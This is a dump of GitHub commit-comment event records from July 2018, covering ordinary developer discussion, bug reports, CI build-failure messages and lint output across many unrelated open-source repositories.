{"id":"7920552917","type":"CommitCommentEvent","actor":{"login":"Kadu88"},"repo":{"name":"Kadu88/demanda-correspondente"},"payload":{"comment":{"id":29600676,"position":null,"line":null,"path":null,"commit_id":"3b7fc73a98525c78c3994e4cde0ae488246318ba","created_at":"2018-07-05T01:41:36Z","updated_at":"2018-07-05T01:41:36Z","author_association":"OWNER","body":"Name of aplication"}},"created_at":"2018-07-05T01:41:36Z"}
{"id":"7920558797","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"AndyGrant/Stockfish"},"payload":{"comment":{"id":29600680,"position":null,"line":null,"path":null,"commit_id":"fcd4b0240b2da6b61035375e214a3592c6bc3f01","created_at":"2018-07-05T01:44:20Z","updated_at":"2018-07-05T01:44:20Z","author_association":"NONE","body":"It is a good idea, but it was tried 2 times IIRC. It was green STC and red LTC. \r\nIt might work this time."}},"created_at":"2018-07-05T01:44:20Z"}
{"id":"7920560164","type":"CommitCommentEvent","actor":{"login":"NicolasCunha"},"repo":{"name":"devteam2018/Work"},"payload":{"comment":{"id":29600681,"position":null,"line":null,"path":null,"commit_id":"bb3371b49ad1234145a5d72997a21364d2e23e4f","created_at":"2018-07-05T01:45:00Z","updated_at":"2018-07-05T01:45:00Z","author_association":"COLLABORATOR","body":"Correção: Criado JavaDoc para o pacote de exceções."}},"created_at":"2018-07-05T01:45:00Z"}
{"id":"7920565461","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"AndyGrant/Stockfish"},"payload":{"comment":{"id":29600687,"position":null,"line":null,"path":null,"commit_id":"fcd4b0240b2da6b61035375e214a3592c6bc3f01","created_at":"2018-07-05T01:47:34Z","updated_at":"2018-07-05T01:47:34Z","author_association":"OWNER","body":"I was not aware of this. If you feel running again is worthy, then lets do it.\r\nDo you recall the other attempts also retuning the value?"}},"created_at":"2018-07-05T01:47:34Z"}
{"id":"7920568248","type":"CommitCommentEvent","actor":{"login":"yaojinrun"},"repo":{"name":"yaojinrun/samples"},"payload":{"comment":{"id":29600689,"position":null,"line":null,"path":null,"commit_id":"e32a62600fae8d7957542a8e512c58dcb27fd026","created_at":"2018-07-05T01:48:53Z","updated_at":"2018-07-05T01:48:53Z","author_association":"OWNER","body":"错误修正"}},"created_at":"2018-07-05T01:48:53Z"}
{"id":"7920569967","type":"CommitCommentEvent","actor":{"login":"solologo"},"repo":{"name":"bluesky139/LTweaks"},"payload":{"comment":{"id":29600690,"position":null,"line":null,"path":null,"commit_id":"25255aac448ff909368e7bd07e8b91e6df71b460","created_at":"2018-07-05T01:49:41Z","updated_at":"2018-07-05T01:49:41Z","author_association":"NONE","body":"这个版本不发布吗😂😂😂"}},"created_at":"2018-07-05T01:49:41Z"}
{"id":"7920571527","type":"CommitCommentEvent","actor":{"login":"Saga305"},"repo":{"name":"Saga305/Python"},"payload":{"comment":{"id":29600696,"position":null,"line":null,"path":null,"commit_id":"00db4ea5299c5c11603b3d6e4b8bdd8ccbbfe2b0","created_at":"2018-07-05T01:50:22Z","updated_at":"2018-07-05T01:50:22Z","author_association":"OWNER","body":"Issue resolved\r\n"}},"created_at":"2018-07-05T01:50:22Z"}
{"id":"7920571924","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29600698,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-05T01:50:34Z","updated_at":"2018-07-05T01:50:34Z","author_association":"NONE","body":"I suppose what I had in mind was a version of troff that is either a commercial product (people like it well enough to pay for it) or is used in a commercial or professional capacity.  One that comes to mind is sqtroff (from the '90s), but I think it is probably long gone.  Another is EROFF, which was available for the PC in the DOS days.\n\nI use groff almost daily to generate batch-mode graphical reports; GNU grap and gpic have some useful capabilities that the Heirloom/n-t-roff versions don't.  It is certainly possible to create complicated documents with it, but it has fallen out of date.  For example, font support is cumbersome and there is no support for OpenType features.\n\nThat AIX troff looks to be a very old version of ditroff, judging by the [online man page](https://www.ibm.com/support/knowledgecenter/en/ssw_aix_72/com.ibm.aix.cmds5/troff.htm).  I can only imagine a very limited use for it these days."}},"created_at":"2018-07-05T01:50:34Z"}
{"id":"7920574420","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"AndyGrant/Stockfish"},"payload":{"comment":{"id":29600702,"position":null,"line":null,"path":null,"commit_id":"fcd4b0240b2da6b61035375e214a3592c6bc3f01","created_at":"2018-07-05T01:51:48Z","updated_at":"2018-07-05T01:51:48Z","author_association":"NONE","body":"> Do you recall the other attempts also retuning the value?\r\n\r\nNo, but the ThreatByPawnPush has slightly changed since then.\r\n\r\nYes, it is worth a try."}},"created_at":"2018-07-05T01:51:48Z"}
{"id":"7920576091","type":"CommitCommentEvent","actor":{"login":"hococoder"},"repo":{"name":"raywenderlich/SC_JoshSteele"},"payload":{"comment":{"id":29600707,"position":null,"line":null,"path":null,"commit_id":"4d16c6a5b32380c13df9c9be7fae283d3acb478a","created_at":"2018-07-05T01:52:37Z","updated_at":"2018-07-05T01:52:37Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [SKStoreReviewController](https://trello.com/c/rWhZ2fEy/107-skstorereviewcontroller)"}},"created_at":"2018-07-05T01:52:37Z"}
{"id":"7920590076","type":"CommitCommentEvent","actor":{"login":"samcooley"},"repo":{"name":"samcooley/website"},"payload":{"comment":{"id":29600728,"position":null,"line":null,"path":null,"commit_id":"20ea334966b9ed3764778c6562c4a32e11900036","created_at":"2018-07-05T01:59:14Z","updated_at":"2018-07-05T01:59:14Z","author_association":"OWNER","body":"missing https on favicon.ico clearly causing warning/failure on https page load\r\n![screen shot 2018-07-04 at 21 55 48](https://user-images.githubusercontent.com/1519349/42298736-7a494f58-7fd5-11e8-82b8-a36b42afd111.png)\r\n"}},"created_at":"2018-07-05T01:59:14Z"}
{"id":"7922204899","type":"CommitCommentEvent","actor":{"login":"MrLucasFischer"},"repo":{"name":"ZinkDigital/boson"},"payload":{"comment":{"id":29604149,"position":4,"line":9,"path":"boson-core/src/main/scala/io/zink/boson/bson/bsonImpl/BosonImpl.scala","commit_id":"e84e1c49418bec11025e60c7122f12e8431e7ac6","created_at":"2018-07-05T10:00:56Z","updated_at":"2018-07-05T10:00:56Z","author_association":"CONTRIBUTOR","body":"@NigeWarren I see what you mean, maybe the **\"bson\"** package in **boson-core** does not make sense since we're abstracting the data structure inside **Codes**. It was, perhaps, a package made when Json was not yet thought about ?? \r\nEverything inside **boson.bson** is generalized in terms of it's data structure, maybe we should remove this **\"bson\"** package, this way we would be more in-line with **boson-scala** and **boson-java** since they do not have neither a **\"bson\"** or a **\"json\"** package."}},"created_at":"2018-07-05T10:00:56Z"}
{"id":"7922206250","type":"CommitCommentEvent","actor":{"login":"NateWr"},"repo":{"name":"bozana/ojs"},"payload":{"comment":{"id":29604151,"position":16,"line":16,"path":"plugins/generic/referenceLinking/locale/en_US/locale.xml","commit_id":"4826a595b0801a6de73904c83812a826b30cbbf9","created_at":"2018-07-05T10:01:10Z","updated_at":"2018-07-05T10:01:10Z","author_association":"NONE","body":"So if an editor never modifies the references, they're never extracted? Should we extract them during initial submission?"}},"created_at":"2018-07-05T10:01:10Z"}
{"id":"7922206328","type":"CommitCommentEvent","actor":{"login":"henbos"},"repo":{"name":"w3c/webrtc-pc"},"payload":{"comment":{"id":29604152,"position":14,"line":7114,"path":"webrtc.html","commit_id":"6ae910eafcbf3df624703c2a8104a0b39d6e029f","created_at":"2018-07-05T10:01:11Z","updated_at":"2018-07-05T10:01:11Z","author_association":"CONTRIBUTOR","body":"How does the application know and control...\r\n1. When I make an offer, which transceiver will be \"offerer tagged\" and which ones it will be bundled with?\r\n2. When I have set the remote offer, which transceivers are \"offerer tagged\" and which ones it is bundled with?\r\n\r\nIs this an undesired consequence of SDP or is this something the application controls? Or am I forced to not bundle things if I want to be able to reject transceivers?\r\n\r\nIf stop() is too aggressive, do we need to have the alternative to disable(), which causes another O/A to disable that m= section within the group (without rejecting it), or do we need to redefine stop() to take care of disabling?\r\n\r\nFrom my point of view this all seems undesirable. Am I missing something?"}},"created_at":"2018-07-05T10:01:11Z"}
{"id":"7922214308","type":"CommitCommentEvent","actor":{"login":"276597270"},"repo":{"name":"muquan123/test"},"payload":{"comment":{"id":29604164,"position":1,"line":1,"path":"555555.txt","commit_id":"233e90a8d1b72a6dff044f22a713fa067cd21367","created_at":"2018-07-05T10:02:42Z","updated_at":"2018-07-05T10:02:42Z","author_association":"CONTRIBUTOR","body":"222"}},"created_at":"2018-07-05T10:02:42Z"}
{"id":"7922216169","type":"CommitCommentEvent","actor":{"login":"276597270"},"repo":{"name":"muquan123/test"},"payload":{"comment":{"id":29604168,"position":null,"line":null,"path":null,"commit_id":"233e90a8d1b72a6dff044f22a713fa067cd21367","created_at":"2018-07-05T10:03:04Z","updated_at":"2018-07-05T10:03:04Z","author_association":"CONTRIBUTOR","body":"22666"}},"created_at":"2018-07-05T10:03:04Z"}
{"id":"7922229800","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Mario"},"payload":{"comment":{"id":29604202,"position":null,"line":null,"path":null,"commit_id":"676f8fec18ba01ea786a7cb0862841f6147e23d3","created_at":"2018-07-05T10:05:38Z","updated_at":"2018-07-05T10:05:38Z","author_association":"OWNER","body":"TinyCI build failure:\nname 'PIPE' is not defined"}},"created_at":"2018-07-05T10:05:38Z"}
{"id":"7922230210","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29604203,"position":null,"line":null,"path":null,"commit_id":"f0eb8ef0bb188089927fd0400414f17d1aa3c82e","created_at":"2018-07-05T10:05:43Z","updated_at":"2018-07-05T10:05:43Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-32](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-32).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-32-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-05T10:05:43Z"}
{"id":"7922230772","type":"CommitCommentEvent","actor":{"login":"littlewindsmail"},"repo":{"name":"littlewindsmail/try4"},"payload":{"comment":{"id":29604205,"position":null,"line":null,"path":null,"commit_id":"8b463bdaae3785471dd813252355b8c7b98430a7","created_at":"2018-07-05T10:05:51Z","updated_at":"2018-07-05T10:05:51Z","author_association":"OWNER","body":"try4"}},"created_at":"2018-07-05T10:05:51Z"}
{"id":"7922233274","type":"CommitCommentEvent","actor":{"login":"bozana"},"repo":{"name":"bozana/ojs"},"payload":{"comment":{"id":29604209,"position":16,"line":16,"path":"plugins/generic/referenceLinking/locale/en_US/locale.xml","commit_id":"4826a595b0801a6de73904c83812a826b30cbbf9","created_at":"2018-07-05T10:06:20Z","updated_at":"2018-07-05T10:06:20Z","author_association":"OWNER","body":"yes, that's right. \r\nand yes, maybe we should extract them during the initial submission. do you think this should happen in the background or somehow then presented to the author as well? "}},"created_at":"2018-07-05T10:06:20Z"}
{"id":"7922236120","type":"CommitCommentEvent","actor":{"login":"goldyl"},"repo":{"name":"goldyl/project"},"payload":{"comment":{"id":29604218,"position":null,"line":null,"path":null,"commit_id":"f2aae6c6685f6d6ea4dfbf31860f67a02f1cdc5a","created_at":"2018-07-05T10:06:50Z","updated_at":"2018-07-05T10:06:50Z","author_association":"OWNER","body":"basic application for led on/off detection"}},"created_at":"2018-07-05T10:06:50Z"}
{"id":"7922236735","type":"CommitCommentEvent","actor":{"login":"littlewindsmail"},"repo":{"name":"littlewindsmail/try4"},"payload":{"comment":{"id":29604219,"position":2,"line":2,"path":"README.md","commit_id":"8b463bdaae3785471dd813252355b8c7b98430a7","created_at":"2018-07-05T10:06:58Z","updated_at":"2018-07-05T10:06:58Z","author_association":"OWNER","body":"this is time4 to try how to user github,chinese coder need good at english。。"}},"created_at":"2018-07-05T10:06:58Z"}
{"id":"7922236807","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29604220,"position":null,"line":null,"path":null,"commit_id":"eb5a8a3dc85b2cb3572687633b07bf93292ead62","created_at":"2018-07-05T10:06:59Z","updated_at":"2018-07-05T10:06:59Z","author_association":"CONTRIBUTOR","body":"I'm told that this commit is the cause of the current PowerPC 603 (all flavors) and MPC8240 issue causing all machines using those CPU's to crash immediately to prompt.  Specifically, Line 185 in src/emu/divtlb.cpp :\r\n\r\n>        m_refcnt[m_live[liveindex] - 1]--;\r\n\r\nShould be in the if on top of it, and maybe more.  That line is bad because it's outside of the m_live[liveindex] != 0 test (which means there's no tlb entry there yet)\r\n\r\nAn easy example set to test would be **gcus**\r\n"}},"created_at":"2018-07-05T10:06:59Z"}
{"id":"7922238719","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604226,"position":8,"line":8,"path":"compiler/psi/src/org/jetbrains/kotlin/psi/KtImportLike.kt","commit_id":"7a6a7877c7ed98318125b7ca17f762d5d841061c","created_at":"2018-07-05T10:07:23Z","updated_at":"2018-07-05T10:07:23Z","author_association":"MEMBER","body":"Is this interface needed?"}},"created_at":"2018-07-05T10:07:23Z"}
{"id":"7922244087","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Mario"},"payload":{"comment":{"id":29604234,"position":null,"line":null,"path":null,"commit_id":"676f8fec18ba01ea786a7cb0862841f6147e23d3","created_at":"2018-07-05T10:08:28Z","updated_at":"2018-07-05T10:08:28Z","author_association":"OWNER","body":"TinyCI build failure:\n'Logger' object is not callable"}},"created_at":"2018-07-05T10:08:28Z"}
{"id":"7922246236","type":"CommitCommentEvent","actor":{"login":"geraldvillorente"},"repo":{"name":"geraldvillorente/build-tools-demo"},"payload":{"comment":{"id":29604239,"position":null,"line":null,"path":null,"commit_id":"274121bd5af858c83b54cccd6b6ad3d351c3ec6c","created_at":"2018-07-05T10:08:54Z","updated_at":"2018-07-05T10:08:54Z","author_association":"OWNER","body":"Created multidev environment [build-tools-demo#ci-1](https://dashboard.pantheon.io/sites/298d3692-c016-408b-972b-854d0b0302a9#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-build-tools-demo.pantheonsite.io/)"}},"created_at":"2018-07-05T10:08:54Z"}
{"id":"7922247561","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Mario"},"payload":{"comment":{"id":29604242,"position":null,"line":null,"path":null,"commit_id":"676f8fec18ba01ea786a7cb0862841f6147e23d3","created_at":"2018-07-05T10:09:10Z","updated_at":"2018-07-05T10:09:10Z","author_association":"OWNER","body":"TinyCI build failure:\nmodule 'build' has no attribute 'make'"}},"created_at":"2018-07-05T10:09:10Z"}
{"id":"7922248845","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29604245,"position":null,"line":null,"path":null,"commit_id":"ffb13194ed8508ca16ba5b9d8a0be53e7a49b088","created_at":"2018-07-05T10:09:25Z","updated_at":"2018-07-05T10:09:25Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/21/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T10:09:25Z"}
{"id":"7922253370","type":"CommitCommentEvent","actor":{"login":"Nick-Nguyen"},"repo":{"name":"nicknguyenprojects/softmall"},"payload":{"comment":{"id":29604266,"position":null,"line":null,"path":null,"commit_id":"a24c8b01db59449db70cb4ff0fe26b0ca1f6aaab","created_at":"2018-07-05T10:10:18Z","updated_at":"2018-07-05T10:10:18Z","author_association":"CONTRIBUTOR","body":"ok"}},"created_at":"2018-07-05T10:10:18Z"}
{"id":"7922253488","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Mario"},"payload":{"comment":{"id":29604268,"position":null,"line":null,"path":null,"commit_id":"676f8fec18ba01ea786a7cb0862841f6147e23d3","created_at":"2018-07-05T10:10:19Z","updated_at":"2018-07-05T10:10:19Z","author_association":"OWNER","body":"TinyCI build failure:\n%d format: a number is required, not bytes"}},"created_at":"2018-07-05T10:10:19Z"}
{"id":"7922255679","type":"CommitCommentEvent","actor":{"login":"henbos"},"repo":{"name":"w3c/webrtc-pc"},"payload":{"comment":{"id":29604272,"position":20,"line":7120,"path":"webrtc.html","commit_id":"6ae910eafcbf3df624703c2a8104a0b39d6e029f","created_at":"2018-07-05T10:10:44Z","updated_at":"2018-07-05T10:10:44Z","author_association":"CONTRIBUTOR","body":"Do we need to run the same steps for any transceiver in the same bundle group?\r\n\r\nI guess this is only applicable for transceivers on offer that have not began transmission yet? If so sending RTCP BYE etc is not applicable, but we need to set t.stopped = true and t.receiver.muted = true?"}},"created_at":"2018-07-05T10:10:44Z"}
{"id":"7922258334","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29604280,"position":null,"line":null,"path":null,"commit_id":"64637d78047db13ebc6d79ae817d54fd32164321","created_at":"2018-07-05T10:11:15Z","updated_at":"2018-07-05T10:11:15Z","author_association":"CONTRIBUTOR","body":"This commit allows single-layer rests to be vertically positioned in the Humdrum-to-MEI converter.\r\n\r\nExample:\r\n\r\n<img width=\"458\" alt=\"screen shot 2018-07-05 at 12 08 41 pm\" src=\"https://user-images.githubusercontent.com/3487289/42317317-4e415988-804c-11e8-95f5-9e040a3aa061.png\">\r\n\r\nInput Humdrum data:\r\n\r\n```\r\n**kern\r\n8rc\r\n8re\r\n8rg\r\n8rb\r\n8rdd\r\n8rff\r\n8raa\r\n*-\r\n```\r\n\r\nOutput MEI data:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-05T12:10:58\" version=\"2.0.0-dev-b3eaed9-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001136839607\">\r\n                <score xml:id=\"score-0000000701267490\">\r\n                    <scoreDef xml:id=\"scoredef-0000000554475420\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001045958475\">\r\n                            <staffDef xml:id=\"staffdef-0000001140979432\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001998761787\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L1\" right=\"invis\" n=\"0\">\r\n                            <staff xml:id=\"staff-0000000067864243\" n=\"1\">\r\n                                <layer xml:id=\"layer-L1F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L2F1\" dur=\"8\" ploc=\"c\" oloc=\"4\" />\r\n                                    <rest xml:id=\"rest-L3F1\" dur=\"8\" ploc=\"e\" oloc=\"4\" />\r\n                                    <rest xml:id=\"rest-L4F1\" dur=\"8\" ploc=\"g\" oloc=\"4\" />\r\n                                    <rest xml:id=\"rest-L5F1\" dur=\"8\" ploc=\"b\" oloc=\"4\" />\r\n                                    <rest xml:id=\"rest-L6F1\" dur=\"8\" ploc=\"d\" oloc=\"5\" />\r\n                                    <rest xml:id=\"rest-L7F1\" dur=\"8\" ploc=\"f\" oloc=\"5\" />\r\n                                    <rest xml:id=\"rest-L8F1\" dur=\"8\" ploc=\"a\" oloc=\"5\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```"}},"created_at":"2018-07-05T10:11:15Z"}
{"id":"7922260169","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/simplehashtable"},"payload":{"comment":{"id":29604282,"position":null,"line":null,"path":null,"commit_id":"9a51afe66e36b44bf5420c3da64ea888f63fda5c","created_at":"2018-07-05T10:11:37Z","updated_at":"2018-07-05T10:11:37Z","author_association":"OWNER","body":"Also made miscellaneous adjustments to the readme"}},"created_at":"2018-07-05T10:11:37Z"}
{"id":"7922260395","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29604283,"position":2,"line":2,"path":"tests/qgraph/qgraph.h","commit_id":"6fd066973f67666f2a0923f841d6e8dd286ea0ae","created_at":"2018-07-05T10:11:39Z","updated_at":"2018-07-05T10:11:39Z","author_association":"OWNER","body":"@bonzini : please look at this header, is the documentation correct? Also, should I also document the static functions in the .c files (like I did in qgraph.c)?"}},"created_at":"2018-07-05T10:11:39Z"}
{"id":"7922261579","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Mario"},"payload":{"comment":{"id":29604284,"position":null,"line":null,"path":null,"commit_id":"676f8fec18ba01ea786a7cb0862841f6147e23d3","created_at":"2018-07-05T10:11:54Z","updated_at":"2018-07-05T10:11:54Z","author_association":"OWNER","body":"TinyCI build failure:\n"}},"created_at":"2018-07-05T10:11:54Z"}
{"id":"7922266623","type":"CommitCommentEvent","actor":{"login":"behdad"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29604297,"position":null,"line":null,"path":null,"commit_id":"1ebaa090d80bf0b59308d2c70f5e58dd8da47450","created_at":"2018-07-05T10:12:57Z","updated_at":"2018-07-05T10:12:57Z","author_association":"COLLABORATOR","body":"Yes, we got BUS_ADRALN on 32bit Androids.  @drott can CC you.  There's not much more info there.  Crashes in init0's memset()."}},"created_at":"2018-07-05T10:12:57Z"}
{"id":"7922267801","type":"CommitCommentEvent","actor":{"login":"paroga"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29604299,"position":30,"line":249,"path":"lib/email/receiver.rb","commit_id":"28dd7fb56231938141635cc08285368c8239bd6a","created_at":"2018-07-05T10:13:11Z","updated_at":"2018-07-05T10:13:11Z","author_association":"CONTRIBUTOR","body":"We only execute one check depending on the site setting.\r\n\r\nThere are different methods to mark mails as spam (see the two test cases), which need different checks.  ```X-Spam-Flag``` and ```X-Spam-Status``` are very similar and work with a simple regular expression, but if we want to implement handling for ```X-Spam-Level``` in the future, a more complex implementation is needed."}},"created_at":"2018-07-05T10:13:11Z"}
{"id":"7922271148","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Mario"},"payload":{"comment":{"id":29604304,"position":null,"line":null,"path":null,"commit_id":"676f8fec18ba01ea786a7cb0862841f6147e23d3","created_at":"2018-07-05T10:13:51Z","updated_at":"2018-07-05T10:13:51Z","author_association":"OWNER","body":"TinyCI build failure:\n[cmake /home/daid/_tinyci/daid/Mario] returned [1]:\nb'-- Configuring incomplete, errors occurred!\\nSee also \"/home/daid/_tinyci/daid/Mario/_build/CMakeFiles/CMakeOutput.log\".\\n'\nb'CMake Error at CMakeLists.txt:7 (find_package):\\n  By not providing \"FindSeriousProton2.cmake\" in CMAKE_MODULE_PATH this\\n  project has asked CMake to find a package configuration file provided by\\n  \"SeriousProton2\", but CMake did not find one.\\n\\n  Could not find a package configuration file provided by \"SeriousProton2\"\\n  with any of the following names:\\n\\n    SeriousProton2Config.cmake\\n    seriousproton2-config.cmake\\n\\n  Add the installation prefix of \"SeriousProton2\" to CMAKE_PREFIX_PATH or set\\n  \"SeriousProton2_DIR\" to a directory containing one of the above files.  If\\n  \"SeriousProton2\" provides a separate development package or SDK, be sure it\\n  has been installed.\\n\\n\\n'"}},"created_at":"2018-07-05T10:13:51Z"}
